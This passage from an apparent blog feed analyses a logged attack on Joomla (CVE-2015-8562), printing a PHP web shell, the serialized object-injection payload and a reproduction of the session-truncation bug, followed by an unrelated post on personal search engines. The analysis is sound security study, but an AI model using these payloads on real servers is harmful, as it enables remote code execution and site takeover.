<p>After decoding and some formatting, we get the following PHP code (by the way, <a href="https://gchq.github.io/CyberChef/#recipe=URL_Decode()Generic_Code_Beautify()Syntax_highlighter(&#x27;auto%20detect&#x27;)&amp;input=JTQwaW5pX3NldCUyOCUyMmRpc3BsYXlfZXJyb3JzJTIyJTJDJTIyMCUyMiUyOSUzQiU0MHNldF90aW1lX2xpbWl0JTI4MCUyOSUzQiU0MHNldF9tYWdpY19xdW90ZXNfcnVudGltZSUyODAlMjklM0JlY2hvJTIwJTI3LSUzRSU3QyUyNyUzQmZpbGVfcHV0X2NvbnRlbnRzJTI4JTI0X1NFUlZFUiU1QiUyN0RPQ1VNRU5UX1JPT1QlMjclNUQuJTI3L3dlYmNvbmZpZy50eHQucGhwJTI3JTJDYmFzZTY0X2RlY29kZSUyOCUyN1BEOXdhSEFnWlhaaGJDZ2tYMUJQVTFSYk1WMHBPejglMkIlMjclMjklMjklM0JlY2hvJTIwJTI3JTdDJTNDLSUyNyUzQg">CyberChef</a> is a great tool to do such things):</p>
<pre><code class="hljs php">@ini_set(<span class="hljs-string">"display_errors"</span>,<span class="hljs-string">"0"</span>);
@set_time_limit(<span class="hljs-number">0</span>);
@set_magic_quotes_runtime(<span class="hljs-number">0</span>);

<span class="hljs-keyword">echo</span> <span class="hljs-string">'-&gt;|'</span>;
file_put_contents(
  $_SERVER[<span class="hljs-string">'DOCUMENT_ROOT'</span>].<span class="hljs-string">'/webconfig.txt.php'</span>,
  base64_decode(<span class="hljs-string">'PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'</span>)
);
<span class="hljs-keyword">echo</span> <span class="hljs-string">'|&lt;-'</span>;
</code></pre>
<p>It tries to write something into the <code>webconfig.txt.php</code> file. After a quick <code>base64_decode</code>, we get another code:</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>($_POST[<span class="hljs-number">1</span>]);<span class="hljs-meta">?&gt;</span>
</code></pre>
<p>It's a simple PHP remote shell that an attacker could use to run any PHP code on the machine. But why encode it with base64? The moment I saved the file for this post with the code above in it, my antivirus software alerted me that it had found a backdoor, but the base64-encoded string didn't bother it at all. Slipping past such scanners is probably the point.</p>
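<p>Both decoding steps (URL decoding, then base64) can be reproduced with nothing but Python's standard library. A small sketch: the query string is copied from the log line above, and the regular expression is just a quick way to fish out the argument of <code>base64_decode</code>, assuming the payload looks exactly like this one:</p>
<pre><code class="hljs python">import base64
import re
from urllib.parse import parse_qs

# The query string of the request from the access log (everything after "/?").
QUERY = (
    "1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29"
    "%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents"
    "%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode"
    "%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B"
)

# Step 1: URL-decode the value of the parameter named "1".
php_code = parse_qs(QUERY)["1"][0]
print(php_code)

# Step 2: grab the argument of base64_decode() and decode it.
encoded = re.search(r"base64_decode\('([A-Za-z0-9+/=]+)'\)", php_code).group(1)
print(base64.b64decode(encoded).decode("ascii"))
</code></pre>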
<p>The problem is that the original HTTP request wasn't for the <code>webconfig.txt.php</code> file (which doesn't even exist yet), so nothing would run the code sent in the <code>1</code> parameter. And anyway, why would they send a command to the remote shell to create itself? There must be some naughtiness in the user agent.</p>
<h3>Code reuse</h3>
<p>After a bit of formatting and decoding, we got this:</p>
<pre><code>}__test|O:21:&quot;JDatabaseDriverMysqli&quot;:3:{
  s:2:&quot;fc&quot;;O:17:&quot;JSimplepieFactory&quot;:0:{}
  s:21:&quot;\0\0\0disconnectHandlers&quot;;a:1:{
    i:0;a:2:{
      i:0;O:9:&quot;SimplePie&quot;:5:{
        s:8:&quot;sanitize&quot;;O:20:&quot;JDatabaseDriverMysql&quot;:0:{}
        s:8:&quot;feed_url&quot;;s:46:&quot;eval($_REQUEST[1]);JFactory::getConfig();exit;&quot;;
        s:19:&quot;cache_name_function&quot;;s:6:&quot;assert&quot;;
        s:5:&quot;cache&quot;;b:1;
        s:11:&quot;cache_class&quot;;O:20:&quot;JDatabaseDriverMysql&quot;:0:{}
      }
      i:1;s:4:&quot;init&quot;;
    }
  }
  s:13:&quot;\0\0\0connection&quot;;b:1;
}\xF0\x9D\x8C\x86
</code></pre>
<p>There is no shortage of naughtiness here, that's for sure. It starts with a <code>}</code> character right away. That could be part of some kind of injection, with the attackers trying to close the previous value with it.</p>
<p>The next part could remind experienced PHP developers of the output of the <code>serialize</code> function, but it's not quite the same format. It's the format produced by the <code>session_encode</code> function, which is also how PHP stores the contents of the session. There is a strange <code>\xF0\x9D\x8C\x86</code> part at the end as well. I can't figure that one out yet, but I'm sure it's up to no good.</p>
<p>It looks like they are trying to create a new variable in the session through the <code>User-Agent</code> header. This new <code>__test</code> variable would be an instance of the <code>JDatabaseDriverMysqli</code> class. It has an active connection (<code>connection</code> is <code>true</code>) and a disconnect handler: on disconnect, the <code>init</code> method should be called on an instance of the <code>SimplePie</code> class. This already sounds a bit strange, but if we take a look at the value of <code>feed_url</code>, it gets even more suspicious:</p>
<pre><code class="hljs php"><span class="hljs-keyword">eval</span>($_REQUEST[<span class="hljs-number">1</span>]);JFactory::getConfig();<span class="hljs-keyword">exit</span>;
</code></pre>
<p>Yet another remote shell, just to be sure.</p>
<h3>Deep in the Joomla</h3>
<p>With the help of the class names starting with a <code>J</code>, we can figure out that it's about <a href="https://www.joomla.org/">Joomla</a>. With a bit more research, we can even find <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562">the vulnerability</a>, along with the affected versions. Now we can check out the source code. The <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L199">relevant part of the <code>JDatabaseDriverMysqli</code> class</a>:</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">$this</span>-&gt;disconnect();
}

<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">disconnect</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;connection)
    {
        <span class="hljs-keyword">foreach</span> (<span class="hljs-keyword">$this</span>-&gt;disconnectHandlers <span class="hljs-keyword">as</span> $h)
        {
            call_user_func_array($h, <span class="hljs-keyword">array</span>( &amp;<span class="hljs-keyword">$this</span>));
        }

        mysqli_close(<span class="hljs-keyword">$this</span>-&gt;connection);
    }

    <span class="hljs-keyword">$this</span>-&gt;connection = <span class="hljs-keyword">null</span>;
}
</code></pre>
<p>Before the object is destroyed, its destructor calls the <code>disconnect</code> method, which runs all the disconnect handlers. In our case, that's the <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/simplepie/simplepie.php#L1504"><code>init</code> method of our suspicious <code>SimplePie</code> class</a>:</p>
<pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">init</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-comment">// ...</span>

    $cache = call_user_func(
        <span class="hljs-keyword">array</span>(<span class="hljs-keyword">$this</span>-&gt;cache_class, <span class="hljs-string">'create'</span>),
        <span class="hljs-keyword">$this</span>-&gt;cache_location,
        call_user_func(<span class="hljs-keyword">$this</span>-&gt;cache_name_function, <span class="hljs-keyword">$this</span>-&gt;feed_url),
        <span class="hljs-string">'spc'</span>
    );

    <span class="hljs-comment">// ...</span>
}
</code></pre>
<p>The interesting part for us is that it calls the <code>cache_name_function</code> with the <code>feed_url</code> as the parameter. With the data from the user agent, this would end up as the following function call:</p>
<pre><code class="hljs php">call_user_func(<span class="hljs-string">'assert'</span>, <span class="hljs-string">'eval($_REQUEST[1]);JFactory::getConfig();exit;'</span>);
</code></pre>
<p>It's quite an old vulnerability, so it relies on the behavior of the <code>assert</code> function before PHP 8.0.0: when it gets a string, it runs it as PHP code and checks the result. So this call would run the PHP code it got in the GET parameter.</p>
<p>We've managed to decipher the request, so it's time to summarize what we found out:</p>
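<p>If the chain is hard to follow, here is a toy Python analogy. The class names mirror the Joomla ones, but everything else is a simplified stand-in: <code>__del__</code> plays the role of PHP's <code>__destruct</code>, the "deserialized" properties are set by hand, and the dangerous <code>assert</code> is replaced with a harmless, hypothetical <code>record</code> function that only logs the string it would have executed:</p>
<pre><code class="hljs python">calls = []


def record(code):
    """Harmless stand-in for PHP's old assert(): just remember the string."""
    calls.append(code)
    return "cache-name"


class SimplePie:
    def init(self, _driver=None):
        # Like SimplePie::init(): the function that computes the cache name
        # is looked up by a *name* stored in the object's own properties.
        func = globals()[self.cache_name_function]
        func(self.feed_url)


class JDatabaseDriverMysqli:
    def __del__(self):
        # Like __destruct() calling disconnect().
        self.disconnect()

    def disconnect(self):
        if self.connection:
            for obj, method_name in self.disconnect_handlers:
                # Like call_user_func_array(array($obj, 'init'), ...).
                getattr(obj, method_name)(self)
        self.connection = None


# What the attacker's session entry amounts to: nothing but property values.
pie = SimplePie()
pie.cache_name_function = "record"
pie.feed_url = "eval($_REQUEST[1]);JFactory::getConfig();exit;"

driver = JDatabaseDriverMysqli()
driver.connection = True
driver.disconnect_handlers = [(pie, "init")]

del driver  # the object goes away and the "destructor" starts the chain
print(calls)
</code></pre>
<p>No new code is written by the attacker here: every step is an existing method, and the serialized data only decides which method calls which.</p>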
<ul>
<li>there is PHP code in a GET parameter that would create a remote shell if it ran</li>
<li>the content of the user agent looks like an injection that would create a new variable in the session</li>
<li>the new variable is a carefully crafted object structure that would run the code in the GET parameter during the removal of the object</li>
</ul>
<p>Joomla at some point <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L1017">puts the user agent into the session</a>. Depending on the configuration this session could be stored in many places, but the default setting is that it <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/storage/database.php#L77">gets saved in a MySQL table with the MySQLi driver</a>. Another important detail here is that it <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L675">sets the character set of the database connection to <code>utf8</code></a> (and most likely the database and the tables have the same <code>utf8</code> character set as well). But how would we end up with an injection?</p>
<h3>Strange behaviors</h3>
<p>We have two suspects remaining: the session handling of PHP and the data storage in MySQL. Let's start with the PHP. Here is a simple example to see how the <code>session_encode</code> works:</p>
<pre><code class="hljs php">session_start();

$_SESSION[<span class="hljs-string">'foo'</span>] = <span class="hljs-keyword">array</span>();
$_SESSION[<span class="hljs-string">'bar'</span>] = <span class="hljs-string">'something'</span>;

<span class="hljs-keyword">print</span>(session_encode() . <span class="hljs-string">"\n"</span>);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
foo|a:0:{}bar|s:9:&quot;something&quot;;
</code></pre>
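<p>To make the format a bit more concrete, here is a rough Python imitation of PHP's default session format (each entry is <code>name|</code> followed by the serialized value). It only covers booleans, integers, strings and arrays, and <code>php_serialize</code>/<code>session_encode</code> are hypothetical helpers, not PHP's implementation. One detail worth noting: the length in <code>s:9:</code> is a byte count, not a character count:</p>
<pre><code class="hljs python">def php_serialize(value) -> str:
    """Serialize bools, ints, strings and dicts in PHP's serialize() format."""
    if isinstance(value, bool):  # check before int: bool is a subclass of int
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP strings are byte strings, so the length is the UTF-8 byte count.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):  # a PHP array
        items = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), items)
    raise TypeError("unsupported type in this sketch: %r" % type(value))


def session_encode(session: dict) -> str:
    """Mimic PHP's default session format: name|value pairs, concatenated."""
    return "".join(name + "|" + php_serialize(value) for name, value in session.items())


print(session_encode({"foo": {}, "bar": "something"}))
</code></pre>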
<p>Now that we roughly know what the expected output looks like we can try to add some naughtiness to it:</p>
<pre><code class="hljs php">session_start();

$_SESSION[<span class="hljs-string">'foo'</span>] = <span class="hljs-keyword">array</span>();
$_SESSION[<span class="hljs-string">'evil'</span>] = <span class="hljs-string">"}__test|O:8:\"stdClass\":1:{s:4:\"evil\";b:1;}\xF0\x9D\x8C\x86"</span>;
$_SESSION[<span class="hljs-string">'bar'</span>] = <span class="hljs-string">'something'</span>;

<span class="hljs-keyword">print</span>(session_encode() . <span class="hljs-string">"\n"</span>);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
foo|a:0:{}evil|s:46:&quot;}__test|O:8:&quot;stdClass&quot;:1:{s:4:&quot;evil&quot;;b:1;}𝌆&quot;;bar|s:9:&quot;something&quot;;
</code></pre>
<p>Nothing exciting yet, it just runs <code>serialize</code> on our naughtiness. Even the strange <code>\xF0\x9D\x8C\x86</code> string turned out to be just a 4-byte UTF-8 character. But what happens if we try to decode this data?</p>
<pre><code class="hljs php">$data = session_encode();

$_SESSION = <span class="hljs-keyword">array</span>();
session_decode($data);

var_dump($_SESSION);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
array(3) {
  [&quot;foo&quot;]=&gt;
  array(0) {
  }
  [&quot;evil&quot;]=&gt;
  string(46) &quot;}__test|O:8:&quot;stdClass&quot;:1:{s:4:&quot;evil&quot;;b:1;}𝌆&quot;
  [&quot;bar&quot;]=&gt;
  string(9) &quot;something&quot;
}
</code></pre>
<p>Absolutely nothing extraordinary. It's so disappointing. Maybe that <code>\xF0\x9D\x8C\x86</code> part is related to MySQL. Let's start a server and check it out.</p>
<pre class="file"><code>docker-compose.yml
</code></pre>
<pre><code class="hljs yaml"><span class="hljs-attr">version:</span> <span class="hljs-string">'3'</span>
<span class="hljs-attr">services:</span>
  <span class="hljs-attr">app:</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">php:5.3.29</span>
    <span class="hljs-attr">volumes:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">.:/app</span>
    <span class="hljs-attr">working_dir:</span> <span class="hljs-string">/app</span>
  <span class="hljs-attr">db:</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">mysql:5.6.51</span>
    <span class="hljs-attr">environment:</span>
      <span class="hljs-attr">MYSQL_ROOT_PASSWORD:</span> <span class="hljs-string">secret</span>
      <span class="hljs-attr">MYSQL_DATABASE:</span> <span class="hljs-string">test</span>
</code></pre>
<p>Our little test script connects to the database, sets the character set of the connection to <code>utf8</code>, creates a table with the same character set, and inserts a row that contains our naughty little byte sequence in the middle. And finally, we read the data back.</p>
<pre><code class="hljs php">$db = <span class="hljs-keyword">new</span> mysqli(<span class="hljs-string">'db'</span>, <span class="hljs-string">'root'</span>, <span class="hljs-string">'secret'</span>, <span class="hljs-string">'test'</span>);
$db-&gt;set_charset(<span class="hljs-string">'utf8'</span>);

$db-&gt;query(<span class="hljs-string">"CREATE TABLE test (id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, data TEXT NOT NULL) CHARACTER SET utf8"</span>);

$stmt = $db-&gt;prepare(<span class="hljs-string">"INSERT INTO test (data) VALUES (?)"</span>);

$data = <span class="hljs-string">"foo\xF0\x9D\x8C\x86bar"</span>;

$stmt-&gt;bind_param(<span class="hljs-string">'s'</span>, $data);
$stmt-&gt;execute();

$result = $db-&gt;query(<span class="hljs-string">"SELECT * FROM test"</span>);
var_dump($result-&gt;fetch_assoc());

$db-&gt;query(<span class="hljs-string">"DROP TABLE test"</span>);
</code></pre>
<pre class="console"><code>$ docker-compose run --rm app php test.php
array(2) {
  [&quot;id&quot;]=&gt;
  string(1) &quot;1&quot;
  [&quot;data&quot;]=&gt;
  string(3) &quot;foo&quot;
}
</code></pre>
<p>At long last, something is happening. Our naughty character vanished, along with everything after it.</p>
<p>The trick is that the <code>utf8</code> character set (its full name is <code>utf8mb3</code>, also known as <a href="https://dev.mysql.com/doc/refman/5.7/en/charset-unicode-utf8mb3.html">3-Byte UTF-8 Unicode Encoding</a>) can't handle 4-byte UTF-8 characters (there is another character set for that, called <code>utf8mb4</code>). When it encounters such a byte sequence, it discards it along with the rest of the data, storing only the data up to the invalid character.</p>
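<p>A rough Python model of what happened to our test row on MySQL 5.6. This is an assumption based on the result above, not MySQL's actual code (newer versions reject the value instead, as the MySQL 5.7 example further down shows): every code point above U+FFFF needs 4 bytes in UTF-8, and the first one ends the stored value.</p>
<pre><code class="hljs python">def store_as_utf8mb3(data: bytes) -> bytes:
    """Imitate a utf8mb3 column silently truncating at the first 4-byte character."""
    text = data.decode("utf-8")
    for index, char in enumerate(text):
        # Code points above U+FFFF need 4 bytes in UTF-8, which utf8mb3 can't store.
        if ord(char) > 0xFFFF:
            text = text[:index]
            break
    return text.encode("utf-8")


print(store_as_utf8mb3(b"foo\xF0\x9D\x8C\x86bar"))
</code></pre>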
<p>Let's look at the <code>session_decode</code> again to see what would happen if we simulate this behavior:</p>
<pre><code class="hljs php">$data = session_encode();
$data = substr($data, <span class="hljs-number">0</span>, strpos($data, <span class="hljs-string">"\xF0\x9D\x8C\x86"</span>));

$_SESSION = <span class="hljs-keyword">array</span>();
session_decode($data);

var_dump($_SESSION);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
array(3) {
  [&quot;foo&quot;]=&gt;
  array(0) {
  }
  [&quot;evil&quot;]=&gt;
  NULL
  [&quot;46:&quot;}__test&quot;]=&gt;
  object(stdClass)#1 (1) {
    [&quot;evil&quot;]=&gt;
    bool(true)
  }
}
</code></pre>
<p>Looks like PHP handles incomplete session data rather poorly. With that, the last piece of the puzzle is finally in place. We managed to reproduce the behavior that lets that remarkably strange HTTP request create a remote shell on the server.</p>
<p>Observant readers may have spotted that I used quite old versions of PHP and MySQL in the examples. The reason is simple: in more recent versions, this would not work.</p>
<p>Inserting our naughty little byte sequence in MySQL 5.7.42:</p>
<pre class="console"><code>$ docker-compose run --rm app php test.php
Fatal error: Uncaught exception 'mysqli_sql_exception' with message 'Incorrect string value: '\xF0\x9D\x8C\x86ba...' for column 'data' at row 1' in /app/test.php:14
Stack trace:
#0 /app/test.php(14): mysqli_stmt-&gt;execute()
#1 {main}
  thrown in /app/test.php on line 14
</code></pre>
<p>Decoding mangled session data in PHP 5.4.45:</p>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.4.45 php test.php
Warning: session_decode(): Failed to decode session object. Session has been destroyed in /app/test.php on line 43
array(1) {
  [&quot;foo&quot;]=&gt;
  array(0) {
  }
}
</code></pre>
<h3>Summary</h3>
<p>It was a long journey, let's review what it took to exploit this vulnerability:</p>
<ul>
<li>an older version of PHP and MySQL (at the time of the publication of this vulnerability PHP 5.4 and MySQL 5.7 have been available for years)</li>
<li>storing the session in MySQL in a table with a <code>utf8</code> character set and with a database connection with a <code>utf8</code> character set as well</li>
<li>storing untrusted user data in the session</li>
<li>the existence of classes in the code that, if combined in an unusual way, will eventually successfully execute a string as PHP code</li>
</ul>
<p>What's the lesson learned? I don't know... things could go sideways even if you do everything right? In any case, remember this little investigation the next time you think that a potential vulnerability (be it in a library you use, the interpreter of your language of choice, or the database) cannot be exploited through your code.</p>
<h3>Further reading</h3>
<ul>
<li><a href="https://websec.files.wordpress.com/2010/11/rips_ccs.pdf">Code Reuse Attacks in PHP: Automated POP Chain Generation</a></li>
<li><a href="https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/">A Different Kind of POP: The Joomla Unserialize Vulnerability</a></li>
<li><a href="https://www.owasp.org/index.php/PHP_Object_Injection">OWASP: PHP Object Injection</a></li>
</ul>

]]></content:encoded>
        </item>
            <item>
            <title>Needle in the haystack</title>
            <link>https://deadlime.hu/en/2023/07/01/needle-in-the-haystack/</link>
            <pubDate>Sat, 01 Jul 2023 15:34:12 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[search]]></category>
                    
            <guid isPermaLink="false">de1785abbd1ea4434a9c5e0ef35eded4</guid>
            <description>Is it just a dream to have your own search engine?</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/crawler.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Our topic for today, dear reader, is a little thought experiment: what if everyone had their own personalized (even local) search engine, instead of having to use central providers (DuckDuckGo, Google, Bing, and others)?</p>
<p>Obviously, from a privacy perspective, it would be a huge step forward if giant corporations weren't able to collect who knows what kind of data about everyone in the world and then do who knows what with it. But is it technologically feasible?</p>
<h3>The search engine</h3>
<p>Before we get into details, let's take a broad look at how a search engine might work.</p>
<h4>Download</h4>
<p>There are programs called crawlers that visit a page, download its HTML source, extract the links from it, visit those pages as well, extract their links, and so on. Well-behaved crawlers respect <a href="https://en.wikipedia.org/wiki/Robots.txt">robots.txt</a>, and site owners can make their work easier by providing a <a href="https://en.wikipedia.org/wiki/Sitemaps">sitemap.xml</a>.</p>
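<p>A minimal sketch of such a crawler, assuming a breadth-first traversal and a single site. To keep it runnable offline, the network is replaced by a <code>fetch</code> callback (a hypothetical stand-in for a real HTTP client that returns the HTML or <code>None</code>), while link extraction and robots.txt handling use Python's standard <code>html.parser</code> and <code>urllib.robotparser</code> modules:</p>
<pre><code class="hljs python">from collections import deque
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin
from urllib.robotparser import RobotFileParser


class LinkExtractor(HTMLParser):
    """Collect the href attribute of every anchor tag."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def crawl(start_url, fetch, robots_txt="", max_pages=100, user_agent="*"):
    """Breadth-first crawl starting at start_url; returns {url: html}."""
    robots = RobotFileParser()
    robots.parse(robots_txt.splitlines())
    queue = deque([start_url])
    seen = {start_url}
    pages = {}
    while queue and max_pages > len(pages):
        url = queue.popleft()
        if not robots.can_fetch(user_agent, url):
            continue  # well-behaved crawlers skip disallowed URLs
        html = fetch(url)
        if html is None:
            continue  # e.g. a 404 or a network error
        pages[url] = html
        extractor = LinkExtractor()
        extractor.feed(html)
        for href in extractor.links:
            # Resolve relative links and drop "#fragment" parts.
            link, _fragment = urldefrag(urljoin(url, href))
            if link not in seen:
                seen.add(link)
                queue.append(link)
    return pages
</code></pre>
<p>A real crawler would also need politeness delays, a per-host queue, and a way to stay within the sites you care about, which is exactly where the numbers below start to hurt.</p>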
<h4>Processing</h4>
<p>Next, data has to be extracted from the many, many HTML source files. Most likely we would also need some context about where the text was found (e.g. in the page header or footer), which can later be used to rank our search results. Additional metadata can be extracted if the website uses the <a href="https://en.wikipedia.org/wiki/Facebook_Platform#Open_Graph_protocol">Open Graph</a>, <a href="https://en.wikipedia.org/wiki/Microformat">Microformats</a>, or <a href="https://en.wikipedia.org/wiki/Schema.org">Schema.org</a> protocols.</p>
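<p>A small sketch of the extraction step, again with the standard <code>html.parser</code> module. It records which of a few hand-picked elements each piece of text is inside (the <code>CONTEXT_TAGS</code> set is an arbitrary choice for this example), so a later ranking step could, say, weigh a title match higher than a footer match. It skips scripts and styles, but doesn't attempt to detect hidden text or other tricks:</p>
<pre><code class="hljs python">from html.parser import HTMLParser

CONTEXT_TAGS = {"title", "h1", "h2", "h3", "header", "nav", "main", "footer"}
SKIP_TAGS = {"script", "style"}


class TextExtractor(HTMLParser):
    """Collect (context, text) pairs; context is the innermost tracked tag."""

    def __init__(self):
        super().__init__()
        self.stack = []   # currently open tags that we care about
        self.chunks = []  # (context, text) pairs

    def handle_starttag(self, tag, attrs):
        if tag in CONTEXT_TAGS or tag in SKIP_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        # Pop back to the matching tag, tolerating unclosed elements inside it.
        if tag in self.stack:
            while self.stack.pop() != tag:
                pass

    def handle_data(self, data):
        text = " ".join(data.split())  # normalize whitespace
        if not text or any(tag in SKIP_TAGS for tag in self.stack):
            return
        context = self.stack[-1] if self.stack else "body"
        self.chunks.append((context, text))


def extract(html):
    parser = TextExtractor()
    parser.feed(html)
    parser.close()
    return parser.chunks
</code></pre>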
<h4>Storage</h4>
<p>We have a couple of options here, depending on how much data we are willing to store. We will definitely need an index that tells us all the pages that contain a word or phrase. If we also want to show the context in which the phrase was found on the results page, we need to store the data extracted in the processing step too. If we want to display the web page the index was generated from, we will need to store the full HTML page as well.</p>
<h4>Search</h4>
<p>A (web) application that converts a search term entered by a user into a database query and displays the results.</p>
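<p>The storage and search parts can be illustrated with a toy inverted index: a mapping from each word to the set of pages containing it. A search for several words then becomes an intersection of those sets. This is a deliberately naive sketch (crude tokenization, no ranking, no phrase search, everything in memory), not how a real search engine stores its index:</p>
<pre><code class="hljs python">import re
from collections import defaultdict


def tokenize(text):
    """Lowercase words; a very crude tokenizer for illustration."""
    return re.findall(r"\w+", text.lower())


def build_index(pages):
    """pages: {url: extracted text} -> {word: set of urls}."""
    index = defaultdict(set)
    for url, text in pages.items():
        for word in tokenize(text):
            index[word].add(url)
    return index


def search(index, query):
    """Return the sorted urls that contain every word of the query."""
    words = tokenize(query)
    if not words:
        return []
    results = set(index.get(words[0], set()))
    for word in words[1:]:
        results = results.intersection(index.get(word, set()))
    return sorted(results)
</code></pre>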
<h3>Download the Internet</h3>
<p>So our first problem is the crawler. According to the Internet, there are roughly 400 million active websites today. Even if each of them has only 10 pages (probably a huge underestimation), we are talking about 4 billion pages we need to visit. If we can download every page in 100ms and extract links from it (also a highly optimistic estimate), it would take a crawler more than 12 years to visit everything. A thousand parallel crawlers could finish in 4-5 days... but it sure would be exciting to see billions of people sending thousands of crawlers to the Internet to build their own index.</p>
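<p>The back-of-the-envelope numbers are easy to double-check (the page count and the 100 ms per page are the rough assumptions from above):</p>
<pre><code class="hljs python">SECONDS_PER_DAY = 24 * 60 * 60
SECONDS_PER_YEAR = 365 * SECONDS_PER_DAY

websites = 400_000_000
pages_per_site = 10       # probably a huge underestimation
seconds_per_page = 0.1    # download + link extraction, highly optimistic

total_seconds = websites * pages_per_site * seconds_per_page
print(f"one crawler: {total_seconds / SECONDS_PER_YEAR:.1f} years")
print(f"1000 crawlers: {total_seconds / 1000 / SECONDS_PER_DAY:.1f} days")
</code></pre>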
<p>And that was a very optimistic estimate. Just how optimistic?</p>
<p>Just think about the fact that nowadays the f...antastic developers like to build websites that are unable to work without downloading and running (multiple megabytes of) JavaScript. So we might need a headless browser to extract the final HTML, which certainly won't finish in 100ms. That would be at least one (but maybe more like two) orders of magnitude slower.</p>
<p>Processing at this scale would probably also be too time-consuming and resource-intensive, even if all the pages were hand-crafted, minimalistic, syntactically and semantically correct HTML... but obviously this is far from reality. And then there are the SEO tricks, like text that is invisible to the user but visible to the crawler, and similar naughty things. We would have to filter those out as well.</p>
<p>Storage has similar problems. Google claims that its index is over 100,000,000 gigabytes (100 petabytes) in size. Even if it's mostly images and videos, this is way too much to store comfortably on a desktop computer. So it seems that there are problems with three of the four parts (download, processing, and storage). We're off to a bad start.</p>
<h3>Alternative solutions</h3>
<p>The overload caused by the crawlers could be solved by allowing crawlers to talk to each other about who has been where and exchange information. Although I don't know how we could do this safely so that a rogue crawler can't poison others with false information. And this doesn't help with the amount of data either.</p>
<p>But do we really need the <em>whole</em> Internet? Chances are that we are only interested in content in our own language and maybe one or two others, and we wouldn't need all of that either. If we could somehow pick the one percent of the Internet we are interested in, then maybe we could make our own search engine work. We could feed our personal search engine the pages we consider important enough to crawl, then follow the external links on those sites, and so on. In the end, we would have a manageable number of HTML files that could probably be stored on our own computer.</p>
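<p>The "start from pages I like and follow their links" idea is essentially a breadth-first crawl from a set of seed pages. A sketch of it: <code>get_links</code> is a hypothetical callback (it would download a page and return the absolute URLs it links to) and is injected here so the code runs offline; the depth and page limits are my own assumptions for keeping the result at a manageable size.</p>

```python
from collections import deque
from urllib.parse import urlparse


def focused_crawl(seeds, get_links, max_depth=2, max_pages=1000):
    """Breadth-first crawl starting from hand-picked seed pages.

    get_links(url) is a hypothetical callback returning the URLs a page links to.
    Pages more than max_depth links away from a seed are never visited.
    """
    seen = set(seeds)
    queue = deque((url, 0) for url in seeds)
    crawled = []
    while queue and max_pages > len(crawled):
        url, depth = queue.popleft()
        crawled.append(url)
        if depth == max_depth:
            continue  # don't follow links any further from here
        for link in get_links(url):
            # Skip mailto:, javascript: and friends, and anything already queued
            if urlparse(link).scheme in ("http", "https") and link not in seen:
                seen.add(link)
                queue.append((link, depth + 1))
    return crawled
```

<p>Breadth-first order means the pages closest to our hand-picked seeds are crawled first, so if we hit the page limit, we lose the most distant (and presumably least relevant) ones.</p>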
<p>All things considered, however, it doesn't seem economical (or even possible) for everyone to run their own crawler and build their own index, but that doesn't necessarily mean that everyone can't have their own copy of an index. There could be, say, an open index format or database structure, and anyone could publish their own indices.</p>
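<p>What such an open index format could look like is anyone's guess; here is a toy sketch, assuming a simple inverted index (word to list of URLs) serialized as JSON with a small header. The <code>example-index/1</code> format name and the function names are made up for this example.</p>

```python
import json
import re
from collections import defaultdict

FORMAT = "example-index/1"  # hypothetical format identifier


def build_index(pages):
    """Build a tiny inverted index from {url: text}: word -> sorted list of URLs containing it."""
    postings = defaultdict(set)
    for url, text in pages.items():
        for word in re.findall(r"\w+", text.lower()):
            postings[word].add(url)
    return {word: sorted(urls) for word, urls in postings.items()}


def export_index(index, name):
    """Serialize the index so that any other program could load it."""
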